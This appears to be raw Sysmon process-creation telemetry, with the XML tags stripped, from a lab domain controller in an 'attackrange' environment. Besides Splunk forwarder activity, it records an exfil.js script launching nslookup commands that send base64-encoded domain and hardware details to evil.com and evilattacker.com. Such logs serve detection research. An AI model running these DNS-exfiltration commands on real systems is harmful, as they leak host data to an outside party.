"C:\Temp\exfil.js" 154100x800000000000000069211Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.321{A8622C2F-597A-6078-6F0E-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:20.583{A8622C2F-5978-6078-6E0E-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069186Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:19.917{A8622C2F-5977-6078-6D0E-00000000AE01}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:19.235{A8622C2F-5977-6078-6C0E-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:17.205{A8622C2F-5975-6078-6B0E-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069126Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:16.646{A8622C2F-5974-6078-6A0E-00000000AE01}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000069116Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:16.120{A8622C2F-5974-6078-690E-00000000AE01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069080Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:08.404{A8622C2F-596C-6078-680E-00000000AE01}2344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596C-6078-660E-00000000AE01}2424C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyr.tmp 2>&1 154100x800000000000000069069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:08.374{A8622C2F-596C-6078-660E-00000000AE01}2424C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A 
RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:07.618{A8622C2F-596B-6078-650E-00000000AE01}2776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596B-6078-630E-00000000AE01}2412C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpvez.tmp 2>&1 154100x800000000000000069026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:07.589{A8622C2F-596B-6078-630E-00000000AE01}2412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpvez.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:06.813{A8622C2F-596A-6078-620E-00000000AE01}564C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-596A-6078-600E-00000000AE01}932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykslr.tmp 2>&1 154100x800000000000000068982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:06.784{A8622C2F-596A-6078-600E-00000000AE01}932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykslr.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068952Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.821{A8622C2F-5969-6078-5F0E-00000000AE01}6160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5969-6078-5D0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctw.tmp 2>&1 154100x800000000000000068941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.791{A8622C2F-5969-6078-5D0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" 
"C:\Temp\exfil.js" 154100x800000000000000068927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.134{A8622C2F-5969-6078-5C0E-00000000AE01}4476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5969-6078-5A0E-00000000AE01}928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohvcvk.tmp 2>&1 154100x800000000000000068916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:05.105{A8622C2F-5969-6078-5A0E-00000000AE01}928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohvcvk.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068853Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:52.696{A8622C2F-595C-6078-590E-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft 
Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-595C-6078-570E-00000000AE01}3368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtg.tmp 2>&1 154100x800000000000000068841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:52.667{A8622C2F-595C-6078-570E-00000000AE01}3368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068816Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:48.606{A8622C2F-5958-6078-560E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5958-6078-540E-00000000AE01}6240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgsx.tmp 2>&1 154100x800000000000000068805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:48.576{A8622C2F-5958-6078-540E-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgsx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:35.061{A8622C2F-594B-6078-530E-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-594B-6078-510E-00000000AE01}5748C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyaf.tmp 2>&1 154100x800000000000000068693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:35.032{A8622C2F-594B-6078-510E-00000000AE01}5748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyaf.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:30.536{A8622C2F-5946-6078-500E-00000000AE01}4476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5946-6078-4E0E-00000000AE01}1140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnf.tmp 2>&1 154100x800000000000000068654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:30.507{A8622C2F-5946-6078-4E0E-00000000AE01}1140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.627{A8622C2F-593E-6078-4D0E-00000000AE01}4164C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-4B0E-00000000AE01}5412C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkqdsmq.tmp 2>&1 154100x800000000000000068576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.598{A8622C2F-593E-6078-4B0E-00000000AE01}5412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkqdsmq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.582{A8622C2F-593E-6078-4A0E-00000000AE01}5116C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-480E-00000000AE01}6416C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllemx.tmp 2>&1 154100x800000000000000068556Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.553{A8622C2F-593E-6078-480E-00000000AE01}6416C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllemx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068547Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.538{A8622C2F-593E-6078-470E-00000000AE01}5864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com 
